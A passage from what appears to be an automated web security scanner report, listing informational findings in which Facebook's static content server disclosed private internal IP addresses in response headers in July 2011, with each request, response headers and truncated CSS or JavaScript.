24.25. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/PSpx_i42gvE.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y2/r/PSpx_i42gvE.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.195

Request

GET /rsrc.php/v1/y2/r/PSpx_i42gvE.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 27 Jun 2011 02:23:57 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Content-Length: 14960
Vary: Accept-Encoding
Cache-Control: public, max-age=29719672
Expires: Wed, 27 Jun 2012 14:25:41 GMT
Date: Tue, 19 Jul 2011 14:57:49 GMT
Connection: close

/*1309270985,169775811*/

html body{background:#f2f2f2}
.devsitePage{font-family:"Lucida Grande", Tahoma, Verdana, Arial, sans-serif;font-size: 11px;color:#333;margin:0;min-width:1024px;font-size: 11p
...[SNIP]...

24.26. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4M_1PP4LZN8.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y3/r/4M_1PP4LZN8.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /rsrc.php/v1/y3/r/4M_1PP4LZN8.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 13 Jul 2011 23:03:47 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 178258
Vary: Accept-Encoding
Cache-Control: public, max-age=31130033
Expires: Fri, 13 Jul 2012 21:38:16 GMT
Date: Tue, 19 Jul 2011 14:24:23 GMT
Connection: close

/*1310679583,169776067*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fbhRl"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...

24.27. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.186

Request

GET /rsrc.php/v1/y3/r/Q3Oe8zcURw5.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 05 Jul 2011 20:02:50 GMT
X-FB-Server: 10.138.17.186
Vary: Accept-Encoding
Content-Length: 686
Cache-Control: public, max-age=30805758
Expires: Tue, 10 Jul 2012 04:07:04 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

/*1310357211,176820666*/

.sp_4z4tic{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/3IAp8xOfnnE.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_a595
...[SNIP]...

24.28. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/ts_55XkdiUP.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y3/r/ts_55XkdiUP.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.197

Request

GET /rsrc.php/v1/y3/r/ts_55XkdiUP.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sat, 09 Jul 2011 20:40:01 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 4980
Vary: Accept-Encoding
Cache-Control: public, max-age=30804480
Expires: Tue, 10 Jul 2012 03:45:15 GMT
Date: Tue, 19 Jul 2011 14:57:15 GMT
Connection: close

/*1310355913,169775813*/

if (window.CavalryLogger) { CavalryLogger.start_js(["dfQwr"]); }

function scribe_log(a,b){new AsyncSignal('/ajax/scribe_log.php',{category:a,message:b}).send();}function tex
...[SNIP]...

24.29. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/v3Y9Tu0WZkw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y3/r/v3Y9Tu0WZkw.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.185

Request

GET /rsrc.php/v1/y3/r/v3Y9Tu0WZkw.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 01:53:31 GMT
X-FB-Server: 10.138.16.185
Content-Length: 14325
Vary: Accept-Encoding
Cache-Control: public, max-age=28388188
Expires: Tue, 12 Jun 2012 04:33:43 GMT
Date: Tue, 19 Jul 2011 14:57:15 GMT
Connection: close

/*1307939603,176820409*/

if (window.CavalryLogger) { CavalryLogger.start_js(["LVwPS"]); }

function captchaRefresh(d,e,f,a,b){var c={new_captcha_type:d,id:f,t_auth_token:a};c.skipped_captcha_data=$('
...[SNIP]...

24.30. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/SK9j5prLTwj.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y4/r/SK9j5prLTwj.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /rsrc.php/v1/y4/r/SK9j5prLTwj.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:11:12 GMT
X-FB-Server: 10.138.16.183
Content-Length: 2271
Vary: Accept-Encoding
Cache-Control: public, max-age=30807801
Expires: Tue, 10 Jul 2012 04:42:01 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1310359292,176820407*/

.marketingBodyCopy{line-height:19px}
h4.marketingBodyTitle{color:#333;font-weight:bold}
h4.marketingBodyTitleMedium{font-size: 14px}
h4.marketingBodyTitleLarge{font-size: 16p
...[SNIP]...

24.31. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/wRBjYtc4wBS.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y4/r/wRBjYtc4wBS.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/y4/r/wRBjYtc4wBS.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sun, 07 Mar 2010 21:28:12 -0800
X-Powered-By: HPHP
X-FB-Server: 10.30.148.193
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 388
Cache-Control: public, max-age=20010758
Expires: Wed, 07 Mar 2012 05:29:53 GMT
Date: Tue, 19 Jul 2011 14:57:15 GMT
Connection: close

/*1299562092,169776321*/

if (window.CavalryLogger) { CavalryLogger.start_js(["DPZps"]); }

function reg_bootload(a,d,e,c,f){var b=function(g){Bootloader.loadComponents(['reg-util','editor'],function(
...[SNIP]...

24.32. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/-r69fEK9JXo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y5/r/-r69fEK9JXo.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.198

Request

GET /rsrc.php/v1/y5/r/-r69fEK9JXo.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sat, 09 Jul 2011 20:41:49 GMT
X-FB-Server: 10.30.146.198
X-Cnection: close
Content-Length: 34506
Vary: Accept-Encoding
Cache-Control: public, max-age=30803654
Expires: Tue, 10 Jul 2012 03:31:46 GMT
Date: Tue, 19 Jul 2011 14:57:32 GMT
Connection: close

/*1310355148,169775814*/

if (window.CavalryLogger) { CavalryLogger.start_js(["gh604"]); }

var NewHigh={reset:function(){this.initialized=false;},ensureInitialized:function(){if(this.initialized)retu
...[SNIP]...

24.33. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/D-4QGnNagV6.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y5/r/D-4QGnNagV6.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.183

Request

GET /rsrc.php/v1/y5/r/D-4QGnNagV6.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:01 GMT
X-FB-Server: 10.138.17.183
Vary: Accept-Encoding
Content-Length: 463
Cache-Control: public, max-age=24210704
Expires: Tue, 24 Apr 2012 20:10:24 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1303762300,176820663*/

.navIdentity{min-height:38px;border-bottom:1px solid #e0e0e0;margin:5px;padding-bottom:5px}
#navAccount ul .navIdentityPic{float:left}
#navAccount ul .navIdentityPic img{widt
...[SNIP]...

24.34. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y5/r/q30FbKmaBid.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/y5/r/q30FbKmaBid.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/help/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 13 Jul 2011 23:02:22 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 5937
Vary: Accept-Encoding
Cache-Control: public, max-age=31059182
Expires: Fri, 13 Jul 2012 02:30:58 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

/*1310610659,169776321*/

.HC_Page_Header{color:#1c2a47;font-size: 16px;padding:6px 0 16px}
.HC_Center{float:left;width:520px}
.HC_Center .uiHeader h2 a{color:#3b5998}
.HC_Header .HC_LikeButton{border
...[SNIP]...

24.35. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y6/r/hbbyfqQ4R56.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.195

Request

GET /rsrc.php/v1/y6/r/hbbyfqQ4R56.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:08:28 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Content-Length: 7575
Vary: Accept-Encoding
Cache-Control: public, max-age=30803437
Expires: Tue, 10 Jul 2012 03:27:51 GMT
Date: Tue, 19 Jul 2011 14:57:14 GMT
Connection: close

/*1310354861,169775811*/

.sp_3f7gkk{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z0/r/GqzvwjakvBj.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_a358
...[SNIP]...

24.36. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/zOMloODzDF_.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y6/r/zOMloODzDF_.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /rsrc.php/v1/y6/r/zOMloODzDF_.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 06 Jun 2011 02:34:20 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Content-Length: 1250
Vary: Accept-Encoding
Cache-Control: public, max-age=27783454
Expires: Tue, 05 Jun 2012 04:36:18 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1307334899,169776320*/

.fbPhotosCloseButton{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/bLZF2p2jXNV.png)}
.fbPhotosCloseButtonSmall{background-image:url(http://static.ak.fbcdn.
...[SNIP]...

24.37. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/BDfYGSOIQq_.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y7/r/BDfYGSOIQq_.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.186

Request

GET /rsrc.php/v1/y7/r/BDfYGSOIQq_.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/careers/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 05 Jul 2011 20:02:50 GMT
X-FB-Server: 10.138.69.186
Vary: Accept-Encoding
Content-Length: 918
Cache-Control: public, max-age=30932287
Expires: Wed, 11 Jul 2012 15:15:58 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

/*1310483758,176833978*/

.sp_1wakkz{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/QD3_2hVZ0xn.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_0ea9
...[SNIP]...

24.38. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/KZtmMbNS3_L.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y7/r/KZtmMbNS3_L.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /rsrc.php/v1/y7/r/KZtmMbNS3_L.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 23 May 2011 23:00:02 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 485
Cache-Control: public, max-age=26893755
Expires: Fri, 25 May 2012 21:27:55 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1306445192,169776067*/

.canvas_error_page h3.error_details{color:#555;font-size: 11px;font-weight:normal;margin:0;padding:10px 0 0 0}
.canvas_error_page p{line-height:16px;margin:10px 0 15px 0}
.ca
...[SNIP]...

24.39. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/VXhD5_PgFOo.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y7/r/VXhD5_PgFOo.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /rsrc.php/v1/y7/r/VXhD5_PgFOo.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:03:30 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 9709
Vary: Accept-Encoding
Cache-Control: public, max-age=30815730
Expires: Tue, 10 Jul 2012 06:53:47 GMT
Date: Tue, 19 Jul 2011 14:58:17 GMT
Connection: close

/*1310367353,169776317*/

.interaction_form div.dialog_content{border-width:0}
.interaction_dialog_body{border-bottom:1px solid #ccc}
.interaction_form_body{padding:0;border-bottom:none}
.interaction_
...[SNIP]...

24.40. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ubbnH6M9ljE.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y7/r/ubbnH6M9ljE.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.197

Request

GET /rsrc.php/v1/y7/r/ubbnH6M9ljE.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:23 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 605
Cache-Control: public, max-age=30201026
Expires: Tue, 03 Jul 2012 04:09:06 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1309752508,169775813*/

.sp_er2zt1{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/-254oo3IVe-.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_cf65
...[SNIP]...

24.41. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/-Ho_EIT75He.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y8/r/-Ho_EIT75He.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.184

Request

GET /rsrc.php/v1/y8/r/-Ho_EIT75He.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:21:38 GMT
X-FB-Server: 10.138.16.184
Content-Length: 4729
Vary: Accept-Encoding
Cache-Control: public, max-age=30198592
Expires: Tue, 03 Jul 2012 03:27:35 GMT
Date: Tue, 19 Jul 2011 14:57:43 GMT
Connection: close

/*1309750081,176820408*/

.text_exposed_root{display:inline}
.text_exposed .text_exposed_show{display:inline}
.text_exposed_show,
.text_exposed .text_exposed_hide{display:none}
.text_exposed_link{font
...[SNIP]...

24.42. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/2oQd79CdXv7.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y8/r/2oQd79CdXv7.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.196

Request

GET /rsrc.php/v1/y8/r/2oQd79CdXv7.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 01:50:38 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 495
Cache-Control: public, max-age=30813264
Expires: Tue, 10 Jul 2012 06:12:12 GMT
Date: Tue, 19 Jul 2011 14:57:48 GMT
Connection: close

/*1310364742,169775812*/

.sp_7oewf3{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/ukvLMiNkr_t.png);background-repeat:no-repeat;display:inline-block;height:13px;width:13px}
.sx_74e6
...[SNIP]...

24.43. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.193

Request

GET /rsrc.php/v1/y8/r/Dg8YLPWKyk7.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 01 Apr 2011 15:54:26 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 581
Cache-Control: public, max-age=30197458
Expires: Tue, 03 Jul 2012 03:09:41 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1309748911,169776065*/

.uiVideoLink{background-color:#000;display:-moz-inline-box;display:inline-block;padding:4px 0;position:relative}
.uiVideoLink:hover{text-decoration:none}
.uiVideoLink i{backg
...[SNIP]...

24.44. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/SNrGdWeoQHs.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y8/r/SNrGdWeoQHs.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /rsrc.php/v1/y8/r/SNrGdWeoQHs.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:08:28 GMT
X-FB-Server: 10.138.16.183
Content-Length: 1403
Vary: Accept-Encoding
Cache-Control: public, max-age=30807762
Expires: Tue, 10 Jul 2012 04:40:36 GMT
Date: Tue, 19 Jul 2011 14:57:54 GMT
Connection: close

/*1310359292,176820407*/

.sp_8mn0mc{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/6HL8HSM452G.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_4155
...[SNIP]...

24.45. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/PVBa_VtP99O.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y9/r/PVBa_VtP99O.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.185

Request

